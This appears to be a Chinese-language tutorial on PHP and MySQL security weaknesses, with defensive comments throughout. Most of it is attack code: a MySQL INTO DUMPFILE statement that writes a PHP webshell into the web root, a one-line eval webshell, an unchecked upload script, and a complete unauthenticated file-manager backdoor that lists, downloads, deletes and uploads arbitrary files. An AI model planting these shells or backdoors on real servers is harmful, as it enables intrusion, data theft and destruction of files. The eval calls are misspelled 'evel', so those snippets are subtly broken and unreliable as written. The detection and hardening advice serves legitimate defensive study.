php中的安全问题

php中的安全问题

mysql部分

mysql端口未更改

通过端口扫描,可以找到3306端口,然后通过弱口令,登录到数据库。防护上,仅仅修改默认端口并不能阻止端口扫描发现服务;更重要的是不要把 MySQL 直接暴露在公网(只监听内网地址,或用防火墙限制来源 IP),并禁止弱口令和远程 root 登录。

mysql文件写权限

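如果登录的数据库账号拥有 FILE 权限,可以通过以下语句把内容写到数据库服务器磁盘上的文件(写的是文件,而不是数据库表)。防护:回收不必要的 FILE 权限,用 secure_file_priv 限制可导出的目录,并确保 mysqld 的运行账号对 web 目录没有写权限。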

//写入php可执行脚本,放到web执行目录中
select "<?php  @evel($_GET['test']);" into dumpfile "D:/ShineMDS/xampp/htdocs/extension/test.php";

php部分

常见的php简单的木马

  • 直接把 POST 或 GET 提交的参数当作代码执行(即常说的“一句话木马”)。排查时可以在 web 目录中搜索把 $_GET/$_POST/$_REQUEST 直接传给代码执行类函数的文件,并留意带 @ 错误抑制符的写法。
<?php  @evel($_GET['test']);
  • 上传文件
<?php
// Stores the uploaded file under the name the client supplied; the destination is a bare
// name, so it is resolved relative to the script's working directory.
// Defender note: no extension, content-type or size check is made and the stored name comes
// from the request, so a file ending in .php would be saved as-is. A legitimate upload
// handler generates the stored name server-side, allow-lists extensions and keeps uploads
// in a directory where the web server does not execute scripts.
move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
  • 遍历目录(下面的示例除了列目录,还带有下载、删除和上传功能,相当于一个简易的文件管理后门;所有路径都直接取自请求参数,没有任何登录校验或目录限制)
<?php
	// Request dispatcher for this sample: the 'action' request value selects which handler runs.
	// Defender note: nothing in this listing checks authentication, a session or a CSRF token
	// before a handler is called, so any client that can reach the file can invoke every action.
	// Hunting hint: access-log entries for one script carrying action=download or action=delete
	// together with an fn= filesystem path match this dispatcher.
	if(!empty($_POST['action'])){
		$action=$_POST['action'];
		switch($action){
		case 'upload':
			upload();
			// no break: control falls through into default, which only leaves the switch
		default:
			break;
		}
	}
	// GET-driven actions; 'delete' changes server state yet is reachable through a plain GET link.
	if(!empty($_GET['action'])){
		$action=$_GET['action'];
		switch($action){
		case 'download':
			download();
			// ends the request here whether or not download() sent a file
			exit;
		case 'delete':
			deleteFile();
			break;
		default:
			break;
		}
	}
	// Sends the file named by the 'fn' query parameter to the client as an attachment and
	// terminates the script; does nothing when 'fn' is empty or the path does not exist.
	// Defender note: 'fn' is used directly as a filesystem path with no base-directory
	// restriction, so any file the web server account can read is returned (arbitrary file
	// read). A legitimate handler resolves the name with realpath() and rejects anything
	// outside an allowed directory.
	function download(){
		if(!empty($_GET['fn']) &&file_exists($_GET['fn']) ){
			$file=$_GET['fn'];
			header('Content-Description: File Transfer');
			header('Content-Type: application/octet-stream');
			// only the base name is exposed to the client, not the full server path
			header('Content-Disposition: attachment; filename="'.basename($file).'"');
			header('Expires: 0');
			header('Cache-Control: must-revalidate');
			header('Pragma: public');
			header('Content-Length: ' . filesize($file));
			readfile($file);
			exit;
		}
	}
	// Deletes the file named by the 'fn' query parameter, then sends a redirect back to this
	// script with 'path' set to the deleted file's parent directory.
	// Defender note: the path comes straight from the request with no directory restriction,
	// so any file the web server account may remove can be deleted, and the operation is
	// triggered by a GET request. The result of unlink() is not checked, the redirect value is
	// not URL-encoded, and no exit follows the header() call in this function.
	function deleteFile(){
		if(!empty($_GET['fn']) &&file_exists($_GET['fn']) ){
			$file=$_GET['fn'];
			unlink($file);
			header("Location:".pathinfo(__FILE__)['basename']."?path=".dirname($file));	
		}
	}
	// Moves the uploaded file into the directory given by the 'path' query parameter, keeping
	// the client-supplied file name.
	// Defender note: both the target directory and the file name are request-controlled and
	// unchecked (no extension allow-list, no base-directory restriction), so a script file can
	// be written anywhere the web server account has write access. 'path' is read without an
	// isset() check, and the return value of move_uploaded_file() is ignored.
	function upload(){
		$path=$_GET['path'];
		move_uploaded_file($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name']);
	}
?>
<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面,任何其他内容都*必须*跟随其后! -->
    <title>文件查看工具</title>
  </head>
 <body>
 <?php
	// Builds two lists, $dirs and $files, describing the entries of the directory to display.
	// The directory defaults to the one containing this script and is replaced by the 'path'
	// query parameter when that is non-empty.
	// Defender note: 'path' is not restricted to any base directory, so every directory the
	// web server account can read may be listed.
	//var_dump();
	$curPath=dirname(__FILE__);
	//echo $curPath;
	$path=$curPath;
	if(!empty($_GET['path'])){
		$path=$_GET['path'];
	}
	// the handle is not checked for failure and is never closed in this listing
	$fh=opendir($path);
	$dirs=array();
	$files=array();
	// the loop tests truthiness, so it also stops early at an entry whose name is "0"
	while($fn=readdir($fh)){
		// assumes directory entries are GBK-encoded (e.g. a Chinese-locale Windows host) — TODO confirm
		$fn=iconv('gbk','UTF-8',$fn);
		$fullName=$path.'/'.$fn;
		$info=array();
		$info['fn']=$fn;
		$info['fullname']=$fullName;
		// '.' and '..' are not filtered out, so they land in $dirs as well
		if(is_dir($path.'/'.$fn)){
			$dirs[]=$info;
		}else{
			$files[]=$info;
		}
	}
?>
	<p><a href="?path=<?=dirname($path)?>">返回上一级</a></p>
	<?php
	// One link per sub-directory. NOTE(review): 'fullname' and 'fn' are echoed without
	// htmlspecialchars() or urlencode(), and 'fullname' is built from the request's 'path'
	// value, so HTML metacharacters in either are reflected into the page as markup.
	foreach($dirs as $v){ ?>
	<a href="?path=<?=$v['fullname']?>"><?=$v['fn']?></a><br>
	<?php }?>
	
	<?php
	// One row per file with download and delete links. The delete link is an ordinary GET URL
	// with no confirmation step or token; the same unescaped-output caveat applies here.
	foreach($files as $v){?>
	<p><?=$v['fn']?>   <a href="?action=download&fn=<?=$v['fullname']?>">下载</a>   <a href="?action=delete&fn=<?=$v['fullname']?>">删除</a></p>
	<?php }?>
	<div>
		<form action="<?php  echo pathinfo(__FILE__)['basename']."?path=$path";?>" enctype="multipart/form-data" method="POST">
			<input type="file" name="file">
			<input type="hidden" name="action" value="upload">
			<input type="submit" value="提交" >
		</form>
	</div>
 </body>
	
</html>